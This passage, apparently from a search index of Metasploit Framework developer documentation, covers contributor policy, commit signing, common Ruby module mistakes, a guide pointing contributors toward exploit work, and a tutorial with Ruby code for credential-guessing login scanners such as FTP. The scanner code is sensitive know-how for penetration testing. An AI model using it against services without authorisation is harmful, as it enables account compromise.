checks against the metadata rake doc:text -- Combine all docs into a plain-text, human readable thing rake doc:html -- Similar to today's info -d rake deps -- Install dependencies local to the current user, if possible rake deps:check -- Check to see if a module can likely be run in the current environment rake build -- Build files that need it, defaults: src/FILE.s =&amp;gt; data/FILE (extracted from exe format), ...? rake clean -- Remove generated files rake clobber -- Reset to pristine, checked-out state . Module generation . At the very least, we will also need tooling to create a mostly-empty but runnable module so that an author knows what to poke when writing. This skeleton can be augmented by questions that can help us use different archetypes, like payload vs. remote, or Ruby vs. Python. These commands could also point the author to relevant module writing articles/documentation. For classic modules . The biggest differences for classic modules are metadata generation and running. These can be accomplished with rake tasks, but it would involve starting up a whole framework instance for each module run. For efficiency, we will need to signal to framework to treat the module specially, perhaps having rake deps:check output/return a specific value when the module needs to be run inside of framework. Metadata would then be dumped directly from the framework loader, and instead of rake run, the classic module loader/runner would be run much as it is today. We will probably want to keep the rake tasks for these things for when we don’t already have a framework instance handy. ",
    "url": "/docs/development/propsals/bundled-modules-proposal.html#keeping-it-all-close",
    "relUrl": "/docs/development/propsals/bundled-modules-proposal.html#keeping-it-all-close"
  },"35": {
    "doc": "Bundled Modules Proposal",
    "title": "Bundled Modules Proposal",
    "content": " ",
    "url": "/docs/development/propsals/bundled-modules-proposal.html",
    "relUrl": "/docs/development/propsals/bundled-modules-proposal.html"
  },"36": {
    "doc": "Code Of Conduct",
    "title": "Contributor Code of Conduct",
    "content": "As contributors and maintainers of this project, and in the interest of fostering an open and welcoming community, we pledge to respect all people who contribute through reporting issues, posting feature requests, updating documentation, submitting pull requests or patches, and other activities. We are committed to making participation in this project a harassment-free experience for everyone, regardless of level of experience, gender, gender identity and expression, sexual orientation, disability, personal appearance, body size, race, ethnicity, age, religion, or nationality. Examples of unacceptable behavior by participants include: . | The use of sexualized language or imagery | Personal attacks | Trolling or insulting/derogatory comments | Public or private harassment | Publishing other’s private information, such as physical or electronic addresses, without explicit permission | Other unethical or unprofessional conduct | . Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful. By adopting this Code of Conduct, project maintainers commit themselves to fairly and consistently applying these principles to every aspect of managing this project. Project maintainers who do not follow or enforce the Code of Conduct may be permanently removed from the project team. This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project maintainers at [email protected]. If the incident involves a committer, you may report directly to [email protected] or [email protected]. All complaints will be reviewed and investigated and will result in a response that is deemed necessary and appropriate to the circumstances. Maintainers are obligated to maintain confidentiality with regard to the reporter of an incident. This Code of Conduct is adapted from the Contributor Covenant, version 1.3.0, available at http://contributor-covenant.org/version/1/3/0/ . ",
    "url": "/docs/code-of-conduct.html#contributor-code-of-conduct",
    "relUrl": "/docs/code-of-conduct.html#contributor-code-of-conduct"
  },"37": {
    "doc": "Code Of Conduct",
    "title": "Code Of Conduct",
    "content": " ",
    "url": "/docs/code-of-conduct.html",
    "relUrl": "/docs/code-of-conduct.html"
  },"38": {
    "doc": "Committer Keys",
    "title": "Keybase.io identities",
    "content": "Keybase.io is used by Metasploit as an easy way to verify identities of committers. If you’re a committer on metasploit-framework, and you need an invite, just ask. | Github Username | Keybase.io Username | . | @adfoster-r7 | adfosterr7 | . | @bcoles | bcoles | . | @bwatters-r7 | bwatters | . | @ccondon-r7 | catc0n | . | @cdelafuente-r7 | cdelafuente | . | @cgranleese-r7 | &nbsp; | . | @chiggins | chiggins | . | @dwelch-r7 | dwelchr7 | . | @erran-r7 | err7n | . | @ekelly-rapid7 | &nbsp; | . | @FireFart | firefart | . | @Green-m | green-m | . | @gwillcox-r7 | grantwillcox | . | @h00die | h00die | . | @hwilson-r7 | &nbsp; | . | @jharris-r7 | &nbsp; | . | @jheysel-r7 | &nbsp; | . | @jmartin-r7 | jmartinr7 | . | @Meatballs1 | meatballs | . | @mkienow-r7 | inokii | . | @mubix | mubix | . | @nhkaraka-r7 | &nbsp; | . | @OJ | oj | . | @rhodgman-r7 | rhodgmanr7 | . | @scriptjunkie | scriptjunkie | . | @sgonzalez-r7 | essgee | . | @smashery | smashery | . | @smcintyre-r7 | &nbsp; | . | @space-r7 | shelbyp | . | @tas-r7 | &nbsp; | . | @timwr | timwr | . | @todb-r7 | todb | . | @void-in | void_in | . | @zgoldman-r7 | &nbsp; | . Note, keybase.io does not require your private key to prove your GitHub identity. Actually sharing your private key with Keybase.io is a matter of contention – here’s the usual argument against, and here’s one thoughtful argument for. ",
    "url": "/docs/development/maintainers/committer-keys.html#keybaseio-identities",
    "relUrl": "/docs/development/maintainers/committer-keys.html#keybaseio-identities"
  },"39": {
    "doc": "Committer Keys",
    "title": "Tracking criteria",
    "content": "In order to get @smcintyre-r7 to track your key, you alert him to its existence through some non-GitHub means, and verify your GitHub username. That’s all there is to it. It would be sociable to track him (and everyone else on this list) back. Tracking is essentially “trusting” and “verifying” – see the much longer discussion here. ",
    "url": "/docs/development/maintainers/committer-keys.html#tracking-criteria",
    "relUrl": "/docs/development/maintainers/committer-keys.html#tracking-criteria"
  },"40": {
    "doc": "Committer Keys",
    "title": "Signing your commits and merges",
    "content": "Contributors are encouraged to sign commits, while Metasploit committers are required to sign their merge commits. Note that the name and e-mail address must match the information on the signing key exactly. To begin: . | Generate a signing key, if you don’t have one already, using your favorite PGP/GPG interface: | . $ gpg --gen-key gpg (GnuPG) 1.4.20; Copyright (C) 2015 Free Software Foundation, Inc. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Please select what kind of key you want: (1) RSA and RSA (default) (2) DSA and Elgamal (3) DSA (sign only) (4) RSA (sign only) Your selection? 4 RSA keys may be between 1024 and 4096 bits long. What keysize do you want? (2048) Requested keysize is 2048 bits Please specify how long the key should be valid. 0 = key does not expire &amp;lt;n&amp;gt; = key expires in n days &amp;lt;n&amp;gt;w = key expires in n weeks &amp;lt;n&amp;gt;m = key expires in n months &amp;lt;n&amp;gt;y = key expires in n years Key is valid for? (0) 1y Key expires at Fri 20 Dec 2019 01:38:11 PM CST Is this correct? (y/N) y You need a user ID to identify your key; the software constructs the user ID from the Real Name, Comment and Email Address in this form: \"Heinrich Heine (Der Dichter) &amp;lt;[email protected]&amp;gt;\" Real name: Dade Murphy Email address: [email protected] Comment: You selected this USER-ID: \"Dade Murphy &amp;lt;[email protected]&amp;gt;\" Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o You need a Passphrase to protect your secret key. Enter passphrase: [...] . | Modify your .git/config file to enable signing commits and merges by default: | . [user] name = Your Name email = [email protected] signingkey = DEADBEEF # Must match name and email exactly! [alias] c = commit -S --edit m = merge -S --no-ff --edit . Using git c and git m from now on will sign every commit with your DEADBEEF key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit – to resign the most recent, use git c --amend. ",
    "url": "/docs/development/maintainers/committer-keys.html#signing-your-commits-and-merges",
    "relUrl": "/docs/development/maintainers/committer-keys.html#signing-your-commits-and-merges"
  },"41": {
    "doc": "Committer Keys",
    "title": "Committer Keys",
    "content": "This page lists the keys in use by Metasploit committers and can be used to verify merge commits made to https://github.com/rapid7/metasploit-framework. ",
    "url": "/docs/development/maintainers/committer-keys.html",
    "relUrl": "/docs/development/maintainers/committer-keys.html"
  },"42": {
    "doc": "Committer Rights",
    "title": "Metasploit Committers",
    "content": "The term “Metasploit Committers” describes people who have direct write access to the Rapid7 Metasploit-Framework fork. These are the people who can land changes to this main fork of the Framework. However, it is not necessary to have committer rights in order to contribute to Metasploit. Much of our code comes from non-committers. We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via Pull Requests. The process for getting started is most comprehensively documented in the Metasploit Development Environment setup guide. Metasploit committers are a mix of Rapid7 employees and outside contributors. Anyone can become a contributor, with the following expectations: . | Committers are empowered to participate in code review, help newbies, and be positive role models in the larger development community. | Committers are likely to take up chores such as writing documentation, evangelization, writing test cases, and code review. | Committers help maintain the character of the Metasploit Framework as a truly independent open source project. | . The Metasploit community is built on the core belief that open contributions and open discussion of security issues has strong benefits for the Internet in general and human society as a whole. By helping each other demonstrate security vulnerabilities and exposures, we foster a community of excellent, ethical practitioners of information security. ",
    "url": "/docs/development/maintainers/committer-rights.html#metasploit-committers",
    "relUrl": "/docs/development/maintainers/committer-rights.html#metasploit-committers"
  },"43": {
    "doc": "Committer Rights",
    "title": "How to be a Committer",
    "content": "Committers tend to review pull requests that come in from other committers and from the wider Metasploit community. Committers generally should not land their own code without some sort of review from another contributor or committer. For most changes, please open a pull request. In addition, always ask for someone to review your work. Even simple fixes might be better done otherwise. If you get no feedback on your pull requests, ask again. Be annoying if necessary! Don’t submit a pull request or make a comment and let it rot because nobody responds. Pull requests should be merged with a git merge -S --no-ff in order to ensure a merge commit is always generated, and your merge commit is signed with your PGP key. Avoid clicking the green “merge” button in Github in order to avoid race conditions with landing code that may sneak past review, and of course, so you can sign your commits. If you reject a pull request, be clear in the pull request why it was rejected, with some effort made to point at helpful resources for next time. Most people don’t often commit to open source code, so when someone does, please be respectful of their efforts. Even if someone else approves of a pull request, and it is shown to be broken later, then it is still your responsibility to correct it. Make every effort to get a fix or revert in as soon as possible, whether you wrote the code, landed it, or approved it. Blame is shared equally. A list of committer public keys is here. ",
    "url": "/docs/development/maintainers/committer-rights.html#how-to-be-a-committer",
    "relUrl": "/docs/development/maintainers/committer-rights.html#how-to-be-a-committer"
  },"44": {
    "doc": "Committer Rights",
    "title": "How to Gain Commit Rights",
    "content": "Commit rights are granted via votes on the committers mailing list. Voting records are archived for the benefit for current and future committers. | Any current committer may nominate any one person as a potential committer by writing to the committers mailing list. | The nominator must provide a justification for committer rights, and include the nominee’s e-mail address. | After some discussion on the mailing list, there will be a group vote on the nominee. | The Metasploit manager (@smcintyre-r7) will inform the new committer of their new commit rights and responsibilities, add the new committer to the appropriate ACL groups and mailing lists, and inform the mailing list of the successful completion of these tasks. | . Committers introduced in this way will have commit rights to the public framework repositories. ",
    "url": "/docs/development/maintainers/committer-rights.html#how-to-gain-commit-rights",
    "relUrl": "/docs/development/maintainers/committer-rights.html#how-to-gain-commit-rights"
  },"45": {
    "doc": "Committer Rights",
    "title": "How to Lose Commit Rights",
    "content": "Committer rights are not granted strictly on the basis of proven code quality; committer rights are a statement of trust by the existing body of committers, so there are highly subjective criteria in play as well. Elements like an agreeable personality, the ability to remain calm in the face of trolling, the avoidance of criminal proceedings, and other aspects of a committer’s life all play a part in the initial granting of commit access. Breaches of trust in terms of malicious or malformed code, or the demonstration of poor judgement that would reflect poorly on the Metasploit project will lead to a discussion on the committer mailing list, and which is likely result in the removal of committer rights. ",
    "url": "/docs/development/maintainers/committer-rights.html#how-to-lose-commit-rights",
    "relUrl": "/docs/development/maintainers/committer-rights.html#how-to-lose-commit-rights"
  },"46": {
    "doc": "Committer Rights",
    "title": "Useful Links for Committers",
    "content": ". | Setting Up a Metasploit Development Environment is pretty much required reading. | So is CONTRIBUTING.md | Check out the Apache Software Foundation’s Guide for Committers. It’s illuminating. | Producing Open Source Software by Ken Fogel is a must-read. | Zach Holman’s Open Source Misfeasance slides – the video is gone! | How to Survive Poisonous People by Ben Collins-Sussman and Brian Fitzpatrick | The Netiquette RFC is about how to be polite. | . ",
    "url": "/docs/development/maintainers/committer-rights.html#useful-links-for-committers",
    "relUrl": "/docs/development/maintainers/committer-rights.html#useful-links-for-committers"
  },"47": {
    "doc": "Committer Rights",
    "title": "Committer Rights",
    "content": " ",
    "url": "/docs/development/maintainers/committer-rights.html",
    "relUrl": "/docs/development/maintainers/committer-rights.html"
  },"48": {
    "doc": "Common Metasploit Module Coding Mistakes",
    "title": "Deprecation notice!",
    "content": "Please see CONTRIBUTING.md for an authoritative coding guide. This document has fallen out of date. We don’t write bad code any more! Hooray! . This is a collection of all the bad code we often see in Metasploit modules. You should avoid them, too. Note: Some of these examples use puts() for demo purposes, but you should always use print_status / print_error when writing a module. Bad Examples You Should NOT Follow: . | Not checking the return value of a Metasploit API | Ruby 1.9.3 vs 1.8.7… gotcha! | Not checking the return value when using match() | Not checking nil before accessing a method | Using exception handling to shut an error up | Not taking advantage of the ‘ensure’ block | Adding the ‘VERBOSE’ option | Neglecting to use ‘vars_post’ for send_request_cgi() when crafting a POST request | Bad variable naming style | Using global variables | Modifying the datastore during execution | . 1. Not checking the return value of a Metasploit API . res = send_request_cgi({ 'method' =&amp;gt; 'GET', 'uri' =&amp;gt; '/app/index.php' }) # There's a bug here, because res can return nil (due to a timeout or other reasons) # If that happens, you will hit a \"undefined method `code' for nil:NilClass\" error. # The correct way should be: if res &amp;amp;&amp;amp; res.code == 200 if res.code == 200 print_status(\"Response looks good\") else print_error(\"Unexpected response\") end . 2. Ruby 1.9.3 vs 1.8.7… gotcha! . some_string = \"ABC\" # This can cause unexpected results to your module. # Better to always do: char = some_string[1, 1] char = some_string[1] if char == 'B' puts \"You will see this message in Ruby 1.9.3\" elsif char == 66 puts \"You will see this message in Ruby 1.8.7\" end . # 1.9 allows a comma after the last argument when calling # a method while 1.8 does not. The most common place to # see this error is in the update_info() section in a # module's constructor. some_method( \"arg1\", \"arg2\", # &amp;lt;-- This comma is a syntax error on 1.8.x ) . 3. Not checking the return value when using match() . str = \"dragon! drag on! Not lizard, I don't do that tongue thing\" # This tries to print \"Not snake\", but it's not in the string, # so you'll get this error: \"undefined method `[]' for nil:NilClass\" puts str.match(/(Not snake)/)[0] . # The above is better written as: if (str =~ /(Not snake)/) puts $1 end . 4. Not checking nil first before accessing a method . str = \"These things are round and tasty, let's call them... tastycles!\" food = str.scan(/donut holes/)[0] # food is nil, and nil has no method called \"empty\". # This will throw an error: \"undefined method `empty?' for nil:NilClass\" if food.empty? or food.nil? puts \"I don't know what it's called\" end . 5. Using exception handling to shut an error up . begin # This block has 2 issues: # Issue #1: sample() is not a method in 1.8.7 # Issue #2: Divided by 0 (race condition) n = [0, 1, 2, 3, 4, 5].sample 1/n rescue # If the user reports a bug saying this code isn't # working, it can be hard to debug exactly what went # wrong for the user without a backtrace. # When you do this, the error also won't be logged in # framework.log, either. # Note that rescuing ::Exception is especially harmful # because it can even hide syntax errors. end . 6. Not taking advantage of the ‘ensure’ block . # You should use the ensure block to make sure x always has a value, # which also avoids repeating code begin n = [0, 1, 2].sample x = 1/n rescue ZeroDivisionError =&amp;gt; e puts \"Are you smarter than a 5th grader? #{e.message}\" x = 0 # Can put this in the ensure block rescue NoMethodError puts \"You must be using an older Ruby\" x = 0 # Can put this in the ensure block end puts \"Value is #{x.to_s}\" . 7. Adding the ‘VERBOSE’ option . register_options( [ # You already have this. Just type 'show advanced' and you'll see it. # So no need to register again OptBool.new(\"VERBOSE\", [false, 'Enable detailed status messages', false]) ], self.class) . 8. Neglecting to use send_request_cgi()’s vars_get or vars_get when crafting a POST/GET request . data_post = 'user=jsmith&amp;amp;pass=hello123' # You should use the 'vars_post' key instead of 'data', # unless you're trying to avoid the API escaping your # parameter names send_request_cgi({ 'method' =&amp;gt; 'POST', 'uri' =&amp;gt; '/', 'data' =&amp;gt; data_post }) . 9. Bad variable naming style . # What's this, Java? # The proper naming style in this case should be: my_string myString = \"hello, world\" . 10. Using global variables . # $msg is a global variable that can be accessed anywhere within the program. # This can induce bugs to other modules or mixins that are hard to debug. # Use @instance variables instead. # This is also mentioned in your HACKING file :-) class Opinion def initialize # This variable shouldn't be shared with other classes $msg = \"It's called the Freedom of Information Act. The Hippies finally got something right.\" end end class Metasploit3 def initialize puts $msg end end Opinion.new Metasploit3.new . 11. Modifying the datastore during execution . # https://github.com/rapid7/metasploit-framework/issues/3853 datastore['BAD'] = 'This is bad.' . ",
    "url": "/docs/development/quality/common-metasploit-module-coding-mistakes.html#deprecation-notice",
    "relUrl": "/docs/development/quality/common-metasploit-module-coding-mistakes.html#deprecation-notice"
  },"49": {
    "doc": "Common Metasploit Module Coding Mistakes",
    "title": "Common Metasploit Module Coding Mistakes",
    "content": " ",
    "url": "/docs/development/quality/common-metasploit-module-coding-mistakes.html",
    "relUrl": "/docs/development/quality/common-metasploit-module-coding-mistakes.html"
  },"50": {
    "doc": "Contact",
    "title": "Chat",
    "content": "A lot of our discussion happens on IRC in #metasploit on Freenode. Please be patient and hang around for a while – not everyone is awake at the same time as you. =) . ",
    "url": "/docs/contact.html#chat",
    "relUrl": "/docs/contact.html#chat"
  },"51": {
    "doc": "Contact",
    "title": "Mailing list",
    "content": "The Metasploit development mailing list used to be hosted on SourceForge, but is now on Google Groups. Metasploit Hackers is dead, long live Metasploit Hackers. (Or mailto:Metasploit Hackers). The old list is archived on seclists.org. ",
    "url": "/docs/contact.html#mailing-list",
    "relUrl": "/docs/contact.html#mailing-list"
  },"52": {
    "doc": "Contact",
    "title": "Abuse",
    "content": "Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to [email protected] which goes to all the current committers. If the incident involves a committer, you may report directly to [email protected] or [email protected]. ",
    "url": "/docs/contact.html#abuse",
    "relUrl": "/docs/contact.html#abuse"
  },"53": {
    "doc": "Contact",
    "title": "Contact",
    "content": " ",
    "url": "/docs/contact.html",
    "relUrl": "/docs/contact.html"
  },"54": {
    "doc": "Contributing to Metasploit",
    "title": "Like hacking things? Start here.",
    "content": "Every so often, we’ll get a request along the lines of, “Hey, I’m new to Metasploit, and I want to help!” The usual answer is something like, “Great! Here’s our framework bug tracker, get crackin!” . However, tackling core Metasploit Framework bugs or particularly squirrelly exploits probably isn’t the right place for the new contributor. Believe me, everyone was a newbie once, there’s no shame in that. Those bugs and vulns are usually complicated, and there are so many to choose from that it’s hard to get started. Here are some ideas to get you started. Metasploit is a tool by and for hackers, but the hackers that maintain it also happen to be software engineers. So, we have some hopefully easy-to-remember Do’s and Don’ts in CONTRIBUTING.md. Read up on those. ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#like-hacking-things-start-here",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#like-hacking-things-start-here"
  },"55": {
    "doc": "Contributing to Metasploit",
    "title": "Making Your First PR",
    "content": "Our preferred method of module submission is via a git pull request from a feature branch on your own fork of Metasploit. You can learn more about making your first PR at Creating Your First PR . ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#making-your-first-pr",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#making-your-first-pr"
  },"56": {
    "doc": "Contributing to Metasploit",
    "title": "Server exploits",
    "content": "Server exploits are always in demand; why bother with complicated social engineering campaigns when you can go straight to the pain point of a vulnerable network. Here are some search queries to get you started: . | Remote exploits from Exploit-DB | . ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#server-exploits",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#server-exploits"
  },"57": {
    "doc": "Contributing to Metasploit",
    "title": "Client Exploits",
    "content": "Client exploits generally run as an “evil service” that a remote client will connect to. They nearly always require some kind of user interaction to trigger, such a viewing a web page, downloading a file, or otherwise connecting to the service controlled by the attacker. | Browser Vulns from SecurityFocus via Google search terms | . ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#client-exploits",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#client-exploits"
  },"58": {
    "doc": "Contributing to Metasploit",
    "title": "Local and Privilege Escalation Exploits",
    "content": "Privilege escalation exploits tend to require the attacker already have an account on a target computer. They are nearly always going to be implemented as Metasploit exploit modules under one of the local trees (platform dependent), but sometimes they’re better off as post modules. This is especially true for privilege escalation bugs. | Local Vulns from Exploit-DB | . ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#local-and-privilege-escalation-exploits",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#local-and-privilege-escalation-exploits"
  },"59": {
    "doc": "Contributing to Metasploit",
    "title": "Unstable modules",
    "content": "Want to pick up where someone else left off? Super! Just check the guide on rescuing Unstable Modules and push these poor, unloved modules over the finish line with decent testing and code cleanup. ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#unstable-modules",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#unstable-modules"
  },"60": {
    "doc": "Contributing to Metasploit",
    "title": "Framework bugs and features",
    "content": "If exploit dev isn’t your thing, but more straightforward Ruby development is, then here are some good places to get started: . | Recent Bugs, which tend to be either very easy or very hard to fix (not a lot of middle ground). | Feature requests, which is often in the same boat. | . Along these same lines is a perennial need for better automated testing, down in the spec directory. If you have a talent for exploring strange and wonderful code bases, pick out a chunk of the Metasploit core code and define out what you expect for working behavior. ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#framework-bugs-and-features",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#framework-bugs-and-features"
  },"61": {
    "doc": "Contributing to Metasploit",
    "title": "Non-code",
    "content": "We can always use better documentation. Those guys over at Offensive Security do a great job with Metasploit Unleashed, but as with all complex bodies of work, there are surely bugs to be found. If you have ideas on how to make the documentation on Metasploit clear and more accessible to more people, go nuts. Write wiki articles in your fork (hint, Gollum is excellent for this) and let someone know about them, we’ll be happy to reflect them here and maintain your credit. If you’re interested in working with us on documentation long-term, that’s even better; reach out on Slack for info on how best to make changes. Ditto with YouTube screencasts of particular common tasks. Narration while you do it is great. People seem to love YouTube videos of this stuff – there are over 40,000 of the things out there, and we’d love for someone to step up and curate a top 10 or top 100 of those that we can promote here for new and experienced users. For developer types: we are slowly but surely converting all of Metasploit to use standardized commenting using YARD, so we could always use more accurate and more comprehensive YARD documentation for pretty much anything found in lib. We will happily take pull requests that contain nothing but comment docs! . Again, there’s always room on #metasploit on Freenode. Be helpful with the questions there, and people are more likely to help you in the future. Same goes for the Metasploit Slack team, where all sorts of new and proficient users and devs are looking for help and camaraderie. ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#non-code",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#non-code"
  },"62": {
    "doc": "Contributing to Metasploit",
    "title": "The Usual Warnings",
    "content": "You probably shouldn’t run proof of concept exploit code you find on the Internet on a machine you care about in a network you care about. That is generally considered a Bad Idea. You also probably shouldn’t use your usual computer as a target for exploit development, since you are intentionally inducing unstable behavior. Also, please take a peek at our guides on using git and our acceptance guidelines for new modules in case you’re not familiar with them. If you get stuck, try to explain your specific problem as best you can on our Freenode IRC channel, #metasploit (joining requires a registered nick). Someone should be able to lend a hand. Apparently, some of those people never sleep. ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#the-usual-warnings",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#the-usual-warnings"
  },"63": {
    "doc": "Contributing to Metasploit",
    "title": "Thank you",
    "content": "In case nobody’s said it yet: Thanks for your interest and support! Exploit developers from the open source community are the soul of Metasploit, and by contributing your time and talent, you are helping advance the state of the art for intelligent IT defense. We simply couldn’t do all of this without you. ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#thank-you",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#thank-you"
  },"64": {
    "doc": "Contributing to Metasploit",
    "title": "Contributing to Metasploit",
    "content": " ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html"
  },"65": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Credential Objects",
    "content": "Metasploit::Framework::Credential (lib/metasploit/framework/credential.rb) . These objects represent the most basic concept of how we now think about Credentials. | Public: The public part of a credential refers to the part that can be publicly known. In almost all cases this is the username. | Private: The private part of the credential, this is the part that should be a secret. This currently represents: Password, SSH Key, NTLM Hash etc. | Private Type: This defines what type of private credential is defined above | Realm: This represents an authentication realm that the credential is valid for. This is a tertiary part of the authentication process. Examples include: Active Directory Domain, Postgres Database etc. | Realm Key: This defines what type of Realm the Realm Attribute represents. | Paired: This attribute is a boolean value that sets whether the Credential must have both a public and private to be valid. | . All LoginScanners use Credential objects as the basis for their attempts. ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#credential-objects",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#credential-objects"
  },"66": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Result Objects",
    "content": "Metasploit::Framework::LoginScanner::Result (lib/metasploit/framework/login_scanner/result.rb) . These are the objects yielded by the scan! method on each LoginScanner. They contain: . | Access Level: An optional Access Level which can describe the level of access granted by the login attempt. | Credential : The Credential object that achieved that result | Proof: An optional proof string to show why we think the result is valid | Status: The status of the login attempt. These values come from Metasploit::model::Login::Status , examples include “Incorrect”, “Unable to Connect”, “Untried” etc | . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#result-objects",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#result-objects"
  },"67": {
    "doc": "Writing an FTP LoginScanner",
    "title": "CredentialCollection",
    "content": "Metasploit::Framework::CredentialCollection (lib/metasploit/framework/credential_collection.rb) . This class is created by the build_credential_collection method provided by the Msf::Auxiliary::AuthBrute mixin. It takes a bunch of options that when specified, will take priority over the corresponding datastore options. Typical uses only need to specify the username: and password: options since those can be different from one module to another (e.g. ‘USERNAME’, ‘SMBUser’, ‘HttpUsername’, etc.). It can be passed in as the cred_details on the LoginScanner, and responds to #each and yields crafted Credentials. The build_credential_collection method will handle prepending usernames and passwords as well as skipping entries as configured by the DB_SKIP_EXISTING option. Example (from modules/auxiliary/scanner/ftp/ftp_login.rb): . cred_collection = build_credential_collection( username: datastore['USERNAME'], password: datastore['PASSWORD'], prepended_creds: anonymous_creds ) . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#credentialcollection",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#credentialcollection"
  },"68": {
    "doc": "Writing an FTP LoginScanner",
    "title": "LoginScanner Base",
    "content": "Metasploit::Framework::LoginScanner::Base (lib/metasploit/framework/login_scanner/base.rb) . This is a Ruby Module that contains all the base behaviour for all LoginScanners. All LoginScanner classes should include this module. The specs for this behaviour are kept in a shared example group. Specs for your LoginScanner should use the following syntax to include these tests: . it_behaves_like 'Metasploit::Framework::LoginScanner::Base', has_realm_key: false, has_default_realm: false . Where has_realm_key and has_default_realm should be set according to whether your LoginScanner has those things. (More on this later) . LoginScanners always take a collection of Credentials to try and one host and port. So each LoginScanner object attempts to login to only one specific service. ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#loginscanner-base",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#loginscanner-base"
  },"69": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Attributes",
    "content": ". | connection_timeout: The time to wait for a connection to timeout | cred_details: An object that yields credentials on each (like credentialCollection or an Array) | host: The address for the target host | port: The port number for the target service | proxies: Any proxies to use in the connection (some scanners might not support this) | stop_on_success: Whether to stop trying after a successful login is found | . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#attributes",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#attributes"
  },"70": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Methods",
    "content": "each_credential . You will not have to worry much about this method, Be aware that it is there. It iterates through whatever is in cred_details, does some normalization and tries to make sure each Credential is properly setup for use by the given LoginScanner. It yields each Credential in a block. def each_credential cred_details.each do |raw_cred| # This could be a Credential object, or a Credential Core, or an Attempt object # so make sure that whatever it is, we end up with a Credential. credential = raw_cred.to_credential if credential.realm.present? &amp;amp;&amp;amp; self.class::REALM_KEY.present? credential.realm_key = self.class::REALM_KEY yield credential elsif credential.realm.blank? &amp;amp;&amp;amp; self.class::REALM_KEY.present? &amp;amp;&amp;amp; self.class::DEFAULT_REALM.present? credential.realm_key = self.class::REALM_KEY credential.realm = self.class::DEFAULT_REALM yield credential elsif credential.realm.present? &amp;amp;&amp;amp; self.class::REALM_KEY.blank? second_cred = credential.dup # Strip the realm off here, as we don't want it credential.realm = nil credential.realm_key = nil yield credential # Some services can take a domain in the username like this even though # they do not explicitly take a domain as part of the protocol. second_cred.public = \"#{second_cred.realm}\\\\#{second_cred.public}\" second_cred.realm = nil second_cred.realm_key = nil yield second_cred else yield credential end end end . set_sane_defaults . This method will be overridden by each specific LoginScanner. This is called at the end of the initializer and sets any sane defaults for attributes that have them and were not given a specific value in the initializer. # This is a placeholder method. Each LoginScanner class # will override this with any sane defaults specific to # its own behaviour. # @abstract # @return [void] def set_sane_defaults self.connection_timeout = 30 if self.connection_timeout.nil? end . attempt_login . This method is just a stub on the Base mixin. It will be overridden in each LoginScanner class to contain the logic to take one single Credential object and use it to make a login attempt against the target service. It returns a ::Metasploit::Framework::LoginScanner::Result object containing all the information about that attempt’s result. For an example let’s look at the attempt_login method from Metasploit::Framework::LoginScanner::FTP (lib/metasploit/framework/login_scanner/ftp.rb) . # (see Base#attempt_login) def attempt_login(credential) result_options = { credential: credential } begin success = connect_login(credential.public, credential.private) rescue ::EOFError, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionProxyError, Rex::ConnectionTimeout, Rex::TimeoutError, Errno::ECONNRESET, Errno::EINTR, ::Timeout::Error result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT success = false end if success result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL elsif !(result_options.has_key? :status) result_options[:status] = Metasploit::Model::Login::Status::INCORRECT end ::Metasploit::Framework::LoginScanner::Result.new(result_options) end . scan! . This method is the main one you will be concerned with. This method does several things: . | It calls valid! which will check all of the validations on the class and raise an Metasploit::Framework::LoginScanner::Invalid if any of the Validations fail. This exception will contain all the errors messages for any failing validations. | it keeps track of the connection error count, and will bail out if we have too many connection 